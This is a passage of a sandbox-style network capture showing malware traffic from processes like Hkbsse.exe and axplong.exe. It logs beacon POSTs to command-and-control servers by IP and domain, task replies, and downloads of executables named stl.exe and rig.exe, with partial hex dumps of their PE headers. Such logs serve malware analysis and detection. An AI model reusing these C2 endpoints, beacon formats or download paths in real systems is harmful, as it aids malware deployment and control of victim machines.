81	192.168.2.7	49839	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:44.159264088 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:44.798856020 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:44.799917936 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:44.990895033 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.7	49841	94.228.166.74	80

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:44.419374943 CEST	158	OUT	POST /online/support/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: o7labs.top Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:45.031373978 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:45.080522060 CEST	318	OUT	POST /online/support/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: o7labs.top Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 31 37 36 30 31 44 33 39 30 39 39 37 38 31 32 45 39 42 31 46 36 38 45 31 41 39 34 32 37 30 37 35 35 46 39 33 37 46 31 44 39 35 31 35 39 38 41 38 34 35 39 39 35 34 32 34 46 45 31 34 35 30 39 44 35 39 30 44 35 31 32 34 46 45 38 41 39 38 38 31 41 33 36 36 44 37 36 38 42 46 41 38 36 30 32 38 37 30 45 43 36 43 45 34 44 46 32 42 43 35 32 38 35 46 42 33 45 30 37 46 45 35 41 32 35 43 41 32 46 32 32 35 30 30 44 34 37 41 35 33 46 43 43 36 34 44 37 36 46 46 32 38 35 33 42 43 35 41 37 36 Data Ascii: r=17601D390997812E9B1F68E1A94270755F937F1D951598A845995424FE14509D590D5124FE8A9881A366D768BFA8602870EC6CE4DF2BC5285FB3E07FE5A25CA2F22500D47A53FCC64D76FF2853BC5A76
Jun 27, 2024 05:59:45.262039900 CEST	385	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 63 33 0d 0a 20 3c 63 3e 31 30 30 30 30 31 32 30 30 31 2b 2b 2b 31 36 37 30 35 33 37 62 30 37 38 65 39 66 32 35 39 64 30 37 36 66 65 62 61 32 35 61 37 38 33 35 31 61 38 37 37 63 30 37 38 39 35 33 39 62 65 31 31 36 39 34 30 33 37 62 65 38 34 32 35 31 38 31 30 35 34 34 31 34 32 61 62 39 64 35 64 31 38 35 23 31 30 30 30 30 31 33 30 30 31 2b 2b 2b 31 36 37 30 35 33 37 62 30 37 38 65 39 66 32 35 39 64 30 37 36 66 65 62 61 32 35 61 37 38 33 35 31 61 38 37 37 63 30 37 38 39 35 33 39 62 65 31 31 36 39 34 30 33 37 62 65 38 34 32 35 31 38 31 30 35 34 35 30 39 32 31 62 39 64 35 64 31 38 35 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: c3 <c>1000012001+++1670537b078e9f259d076feba25a78351a877c0789539be11694037be84251810544142ab9d5d185#1000013001+++1670537b078e9f259d076feba25a78351a877c0789539be11694037be842518105450921b9d5d185#<d>0
Jun 27, 2024 05:59:47.455012083 CEST	186	OUT	POST /online/support/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: o7labs.top Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 31 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000012001&unit=246122658369
Jun 27, 2024 05:59:47.632941961 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jun 27, 2024 05:59:50.250017881 CEST	186	OUT	POST /online/support/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: o7labs.top Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 31 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000013001&unit=246122658369
Jun 27, 2024 05:59:50.426942110 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.7	49842	78.89.199.216	80

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:44.714054108 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pnnoymgsqecpte.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 245 Host: movlat.com
Jun 27, 2024 05:59:44.714457989 CEST	245	OUT	Data Raw: 3b 6e 58 65 8c c9 61 56 da a2 c3 73 77 01 7e bb 7a 0e cd e7 62 76 e3 67 0e 08 0e e5 40 c2 c3 1a ed 5c c2 20 02 6a 24 6c ec 97 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 3f 30 eb b7 Data Ascii: ;nXeaVsw~zbvg@\ j$l?=8kI?pLM@NA -[k,vu?0l?XiwcNX$Se9Hn^lrFd4@L3gzA1zi(nX/adWv09uH1eF8Jj5LRl?$
Jun 27, 2024 05:59:45.834252119 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 27 Jun 2024 03:59:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.7	49843	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:44.785660028 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:45.487251043 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:45.532252073 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:45.764468908 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.7	49844	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:45.353302956 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:45.947149992 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:45.949230909 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:46.150053024 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.7	49845	94.228.166.74	80

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:45.666047096 CEST	58	OUT	GET /wp-includes/stl.exe HTTP/1.1 Host: 94.228.166.74
Jun 27, 2024 05:59:46.298055887 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:46 GMT Content-Type: application/octet-stream Content-Length: 523264 Last-Modified: Tue, 25 Jun 2024 13:08:13 GMT Connection: keep-alive ETag: "667ac13d-7fc00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 74 0c c0 e7 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 f0 07 00 00 08 00 00 00 00 00 00 32 68 03 00 00 20 00 00 00 20 08 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 67 03 00 4f 00 00 00 00 20 08 00 98 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 08 00 0c 00 00 00 c4 67 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt02h @ `@gO @g H.textH `.rsrc @@.reloc@@B
Jun 27, 2024 05:59:46.298069954 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 68 03 00 00 00 00 00 48 00 00 00 02 00 05 00 b4 48 01 00 58 1e 02 00 03 00 00 Data Ascii: hHHXg{:}({20}+rpsz({{~((,
Jun 27, 2024 05:59:46.298086882 CEST	1236	IN	Data Raw: 00 00 0a 6f 3c 00 00 0a 02 17 6f 3d 00 00 0a 02 72 89 00 00 70 22 00 00 20 41 73 3e 00 00 0a 6f 3f 00 00 0a 02 72 79 00 00 70 28 38 00 00 0a 6f 40 00 00 0a 02 20 90 00 00 00 1f 2f 73 41 00 00 0a 28 42 00 00 0a 02 20 90 00 00 00 1f 2f 73 41 00 00 Data Ascii: o<o=rp" As>o?ryp(8o@ /sA(B /sAoCsD%oE%oF}sG%oH}{sIoJ(K 3!~L ((&~L(M(N*0{{,:{ /{
Jun 27, 2024 05:59:46.298208952 CEST	1236	IN	Data Raw: 0f 00 00 04 02 03 6f 67 00 00 0a 7d 10 00 00 04 02 03 28 2e 00 00 0a 2a ae 03 6f 66 00 00 0a 20 00 00 10 00 2e 01 2a 02 7b 16 00 00 04 2c 0d 03 28 24 00 00 06 2c 05 28 69 00 00 0a 02 03 28 6a 00 00 0a 2a c2 02 7b 0f 00 00 04 2c 20 02 28 6b 00 00 Data Ascii: og}(.of .{,($,(i(j{, (k(l{(m(noo(/^{,}(,0s(p}(q (:o=orss(tdsAoCrp"As>
Jun 27, 2024 05:59:46.298223972 CEST	1236	IN	Data Raw: 02 17 7d 1b 00 00 04 02 16 7d 1c 00 00 04 2b 56 03 6f 63 00 00 0a 1f 5d 31 37 03 6f 63 00 00 0a 20 96 00 00 00 2f 2a 03 6f 64 00 00 0a 16 31 21 03 6f 64 00 00 0a 1f 1f 2f 17 02 16 7d 1a 00 00 04 02 16 7d 1b 00 00 04 02 17 7d 1c 00 00 04 2b 15 02 Data Ascii: }}+Voc]17oc /od1!od/}}}+}}}((0}}}(V(.(-&(0(,({,6{of _, o,.+o
Jun 27, 2024 05:59:46.298234940 CEST	1236	IN	Data Raw: 00 00 00 13 30 04 00 7e 00 00 00 00 00 00 00 02 72 79 00 00 70 28 38 00 00 0a 7d 2b 00 00 04 02 72 39 01 00 70 28 38 00 00 0a 7d 2c 00 00 04 02 28 96 00 00 0a 02 72 89 00 00 70 22 00 00 10 41 16 73 92 00 00 0a 6f 3f 00 00 0a 02 28 3b 00 00 0a 6f Data Ascii: 0~ryp(8}+r9p(8},(rp"Aso?(;o<{+({,({,(((uov>((-&((((,~.(>((({,({,(
Jun 27, 2024 05:59:46.298254967 CEST	1236	IN	Data Raw: 30 00 00 04 02 02 7b 3f 00 00 04 73 58 00 00 0a 7d 32 00 00 04 02 7b 2f 00 00 04 6f af 00 00 0a 16 30 08 02 28 8b 00 00 06 2b 06 02 28 1b 00 00 0a 02 28 1b 00 00 0a 2a 00 00 00 13 30 02 00 50 00 00 00 00 00 00 00 04 6f b0 00 00 0a 2c 1c 04 6f b1 Data Ascii: 0{?sX}2{/o0(+((0Po,oA3{/ooo,oC3{/ooo"o"o6{/o-&*0{1soo{1o{1{/o4
Jun 27, 2024 05:59:46.298273087 CEST	108	IN	Data Raw: 00 00 0a 02 7b 31 00 00 04 02 fe 06 7f 00 00 06 73 49 00 00 0a 6f d0 00 00 0a 02 7b 2f 00 00 04 6f c1 00 00 0a 02 7b 31 00 00 04 6f c2 00 00 0a 2a 9e 02 7b 31 00 00 04 2d 01 2a 02 7b 2f 00 00 04 6f c1 00 00 0a 02 7b 31 00 00 04 6f d1 00 00 0a 02 Data Ascii: {1sIo{/o{1o{1-{/o{1o}1*{/o\o
Jun 27, 2024 05:59:46.298286915 CEST	1236	IN	Data Raw: 7b 2f 00 00 04 6f af 00 00 0a 16 31 07 02 28 8b 00 00 06 2a 02 28 8a 00 00 06 2a 4a 02 7b 2f 00 00 04 02 6f 5c 00 00 0a 6f be 00 00 0a 2a 00 13 30 07 00 6f 01 00 00 08 00 00 11 02 03 28 62 00 00 0a 02 28 34 00 00 0a 02 28 35 00 00 0a 73 d2 00 00 Data Ascii: {/o1((J{/o\o*0o(b(4(5s((oP(b-{/(4#Yo+9{/0{/o(soo{/(4;Yo{/(qo{/(so{;,.{0
Jun 27, 2024 05:59:46.298311949 CEST	1236	IN	Data Raw: 73 ff 00 00 0a 0b 73 00 01 00 0a 0c 20 00 04 00 00 8d f1 00 00 01 0d 16 13 04 2b 11 08 09 16 11 05 6f 01 01 00 0a 11 04 11 05 58 13 04 07 09 16 20 00 04 00 00 6f 02 01 00 0a 25 13 05 16 30 dc 28 03 01 00 0a 08 6f 04 01 00 0a 16 11 04 6f 05 01 00 Data Ascii: ss +oX o%0(oo,o`,o`,o`*(K`[jmt0}sss +oX o%
Jun 27, 2024 05:59:46.302982092 CEST	1236	IN	Data Raw: 00 0a 07 6f 0e 01 00 0a 0d de 14 08 2c 06 08 6f 60 00 00 0a dc 07 2c 06 07 6f 60 00 00 0a dc 09 2a 00 00 01 1c 00 00 02 00 16 00 1a 30 00 0a 00 00 00 00 02 00 0e 00 2c 3a 00 0a 00 00 00 00 3a 02 16 02 6f 0f 01 00 0a 28 10 01 00 0a 2a 42 03 16 32 Data Ascii: o,o`,o`0,::o(B2ojo2o"(*(&(2(&(2(&(2(&(2("(*
Jun 27, 2024 05:59:47.643212080 CEST	58	OUT	GET /wp-includes/rig.exe HTTP/1.1 Host: 94.228.166.74
Jun 27, 2024 05:59:47.818033934 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:47 GMT Content-Type: application/octet-stream Content-Length: 2608640 Last-Modified: Thu, 14 Sep 2023 14:14:56 GMT Connection: keep-alive ETag: "65031560-27ce00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 07 00 5f 39 74 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 6e 00 00 00 5c 27 00 00 00 00 00 40 11 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 28 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 91 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 f0 27 00 74 01 00 00 00 00 00 00 00 00 00 00 00 20 28 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 80 00 00 28 00 00 00 10 84 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEd_9tf"n\'@@0(`<'t (x(8 X.text&mn `.rdatar@@.dataD':'@.pdatat''@@.00cfg('@@.tls('@.relocx ('@B

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.7	49846	78.89.199.216	80

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:45.841356993 CEST	272	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mttuqhpgbmbkl.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 247 Host: movlat.com
Jun 27, 2024 05:59:45.841371059 CEST	247	OUT	Data Raw: 3b 6e 58 65 8c c9 61 56 da a2 c3 73 77 01 7e bb 7a 0e cd e7 62 76 e3 67 0e 08 0e e5 40 c2 c3 1a ed 5c c2 20 02 6a 24 6c ec 97 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 32 49 f0 bb Data Ascii: ;nXeaVsw~zbvg@\ j$l?=8kI?pLM@NA -[k,vu2IArp^R?ruw*}hd&/(L u]N5$pI'9lR&sd+XbyU~MOu<>%"
Jun 27, 2024 05:59:46.916836023 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 27 Jun 2024 03:59:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.7	49848	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:45.886842012 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:46.572521925 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
